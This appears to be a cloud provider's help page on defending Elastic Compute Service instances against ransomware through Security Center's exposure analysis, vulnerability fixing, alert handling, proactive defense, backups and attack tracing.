After ransomware intrudes into an Elastic Compute Service (ECS) instance, data on the instance is encrypted and is used by attackers for ransom. This causes service interruptions, data leaks, and data loss. This topic describes the solutions that you can use to protect your ECS instances from ransomware.
- Important accounts with weak passwords or absence of authentication mechanisms
- Weak passwords or no passwords are configured for the important accounts of your server. The accounts include the root account and the administrator account.
- Weak passwords or no passwords are configured for your databases on which important services are deployed. The databases include Redis, MongoDB, MySQL, and Microsoft SQL Server databases.
- Services exposed on the Internet due to absence of access control policies
Services such as RDP, SSH, Redis, MongoDB, MySQL, and Microsoft SQL Server can be accessed over the Internet. The services are vulnerable.
- High-risk vulnerabilities on the operating systems and software of your servers
High-risk vulnerabilities are detected on the operating systems and software of your servers. Attackers upload encryption ransomware or perform ransomware operations to launch remote attacks.
|Before ransomware intrusion||Check security configurations.||
Security Center provides the features of asset exposure analysis, baseline check, configuration assessment, and AccessKey pair leak detection. You can use the features to achieve the following purposes:
|Scan servers for vulnerabilities and fix detected vulnerabilities at the earliest opportunity.||Security Center provides the vulnerability fixing feature. If Security Center detects vulnerabilities on your servers, we recommend that you use the feature to fix high-risk vulnerabilities at the earliest opportunity.|
|Create anti-ransomware policies for servers and databases.||Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases to defend against ransomware. You can use the features to protect your servers and databases from ransomware.||Backups based on anti-ransomware policies|
|Enable features supported by the proactive defense module.||Security Center provides the proactive defense module. The features that are supported by the module can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature that can be used to precisely block ransomware.||Proactive defense|
|During ransomware intrusion||Handle alerts generated by Security Center at the earliest opportunity.||Security Center generates different types of alerts for your assets in real time. The types of alerts include the alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take actions at the earliest opportunity.||Alerts|
|After ransomware intrusion||Restore encrypted data of your assets.||Security Center provides the features of anti-ransomware for servers and anti-ransomware for databases. The features allow you to create anti-ransomware policies for your servers and databases. You can back up the data on your servers and databases based on the policies. If the data on your servers or databases is encrypted by ransomware, you can create a restoration task to restore data.||Backups based on anti-ransomware policies|
|Trace ransomware attacks.||Security Center provides the feature of attack source tracing. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions.||Attack source tracing|
The following sections describe the features and operations related to anti-ransomware solutions.
Asset exposure analysis
- Analysis of exposed components
Asset exposure analysis allows you to view exposed components to check whether components or services such as Redis, MongoDB, and Elasticsearch are exposed on the Internet. If a component is exposed, you can disconnect the Internet chain of the component. For example, you can configure security groups to allow requests only from specific CIDR blocks.
- Analysis of exposed weak passwords
If a system uses weak passwords and the passwords are exposed on the Internet, the system can be easily attacked. You must fix risks that are caused by the weak passwords at the earliest opportunity.
You can use the baseline check feature to check for threats in the baseline configurations that are included in the default baseline check policy. The threats include weak passwords, unauthorized access, vulnerabilities, and configuration risks. After you fix detected baseline risks on your system, databases, and software, you can prevent ransomware in an efficient manner. For more information, see Overview.
You can use the configuration assessment feature to check the following configurations of your Alibaba Cloud services for risks: identity authentication and permissions, network access control, data security, log audit, monitoring and alerting, and basic security protection. If risks are detected, Security Center provides solutions. We recommend that you handle detected high-risk items. For more information, see Overview.
AccessKey pair leak detection
You can use the feature of AccessKey pair leak detection to check the usernames and passwords in source code stored on platforms such as GitHub in real time. This helps you detect leaks of the usernames and passwords for your assets. If leaks are detected, Security Center generates alerts. This helps you detect and handle potential AccessKey pair leaks at the earliest opportunity. For more information, see Detection of AccessKey pair leaks.
Configure scheduled vulnerability detection
We recommend that you enable application vulnerability detection and specify a minimum detection cycle for scheduled vulnerability detection. The minimum detection cycle is three days. You must ensure that all vulnerabilities that are added to the vulnerability whitelist are necessary. For more information, see Configure vulnerability settings.
Priorities to fix vulnerabilities
Application whitelists are detected based on whether vulnerabilities are compliant or can be easily exploited. If detected application vulnerabilities can be easily exploited, the details about the vulnerabilities are displayed in the Security Center console, and the Proof of Concept (PoC) and Exploit of each vulnerability can be easily obtained from the Internet. These vulnerabilities can be easily exploited by attackers, mining programs, and computer worms. Therefore, you must fix the vulnerabilities that can be easily exploited based on priorities in descending order. The priorities are determined by the score of urgency to fix a vulnerability. You must also fix the vulnerabilities that are detected on unexposed services. This prevents the vulnerabilities from being exploited by attackers, mining programs, and computer worms to implement lateral movement in internal networks, which reduces adverse impacts on your assets. For more information, see Priorities to fix vulnerabilities.
Exploitability of vulnerabilities
- Fix vulnerabilities
Follow the solutions included in vulnerability details.
- Handle vulnerabilities
Click the ID of a security group or an instance to go to the page that displays the configurations of the specified security group, Server Load Balancer (SLB) instance, or Network Address Translation (NAT) gateway. On the page, delete the port forwarding rule that exposes your services on the Internet, or configure the security group to allow requests only from specific IP addresses or CIDR blocks. If you handle a vulnerability, you still need to fix the vulnerability.
For more information about how to fix a vulnerability, see Overview.
Security Center generates different types of alerts for your assets in real time. The types of alerts include the alerts for web tampering, suspicious processes, webshells, unusual logons, and malicious processes. Security Center detects threats to your assets based on more than 250 threat detection models. This allows you to monitor the security posture of your assets in real time and take actions at the earliest opportunity.
You can perform the following steps to handle alerts on ransomware:
- Log on to the Security Center console.
- In the left-side navigation pane, choose .
- In the alert list of the Alerts page, find the alert on ransomware and click Process in the Actions column.
- In the dialog box that appears, set Process Method to Anti-Virus and select Isolate the source file of the process.
- Click Process Now. After you isolate the source file of a malicious process, the process can no longer be started.
- Log on to the server on which the alert is generated and check whether a suspicious
scheduled task exists in the crontab file. If a suspicious scheduled task exists, you must delete or comment out the task.
Security Center provides the proactive defense module. The features that are supported by the module can automatically intercept common viruses, malicious network connections, and webshell connections. The module allows you to use bait to capture ransomware. Security Center also provides the virus blocking feature. You can use the feature to block ransomware before a ransomware attack occurs. For more information about how to enable the virus blocking feature, see Use proactive defense.
Ransomware may adversely affect the Security Center agent. We recommend that you enable the client protection feature. For more information about how to enable the client protection feature, see Use the client protection feature.
Backups based on anti-ransomware policies
- Anti-ransomware for servers
You can use the anti-ransomware feature of Security Center to create anti-ransomware policies for your server. The server can be an ECS instance, a server that is not deployed on Alibaba Cloud, a server that is deployed in the classic network, or a server that is deployed in a virtual private cloud (VPC). After you create an anti-ransomware policy, Security Center automatically backs up data in protected directories on your server. If your server is attacked by ransomware, you can restore data based on the backups. This prevents negative impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.
- Anti-ransomware for databases
You can create anti-ransomware policies for the following types of databases that are deployed on ECS instances to back up data in the databases: MySQL, Oracle, and SQL Server databases. If your database is intruded by ransomware, you can restore data in the database based on the backups. This prevents adverse impacts on your business. For more information, see Create an anti-ransomware policy and Create a restoration task.
- Data backup consumes network bandwidth. We recommend that you specify the backup start time to a point in time within off-peak hours. You can configure the Start Time parameter in an anti-ransomware policy based on your business requirements. We recommend that you specify the backup start time to a point in time within the off-peak hours and make sure that the time is not the start of an hour. If you perform full backup for the first time or perform incremental backup for a large number of files, the backup may take several hours.
- We recommend that you specify only specific directories that you want to protect when you create an anti-ransomware policy. This helps release the anti-ransomware capacity and minimize the impacts on the performance of your server.
- We recommend that you check the anti-ransomware capacity on a regular basis to ensure that you have sufficient anti-ransomware capacity. If the anti-ransomware capacity is insufficient and you do not purchase additional anti-ransomware capacity or delete backup data to release the anti-ransomware capacity, data backup is stopped. The backup data is automatically deleted after the specified retention period.
- If you back up a directory of an ECS instance to which an Apsara File Storage NAS (NAS) file system or Object Storage Service (OSS) bucket is mounted, the data in the NAS file system or OSS bucket is backed up. We recommend that you exclude mount directories when you specify directories to protect, or specify only necessary data in the mount directories to protect.
- A large number of data fragments can cause high disk space usage, log storage usage, and memory usage. We recommend that you clear data from your disks on a regular basis. For more information about how to clear data from a disk, see Release disk space occupied by backup caches.
Attack source tracing
Security Center provides the feature of attack source tracing. The feature can restore attack paths based on the attack statistics collected by the Security Center agent and Graph Compute. The feature helps you view the processes and chain diagrams of ransomware intrusions. For more information, see Use attack source tracing.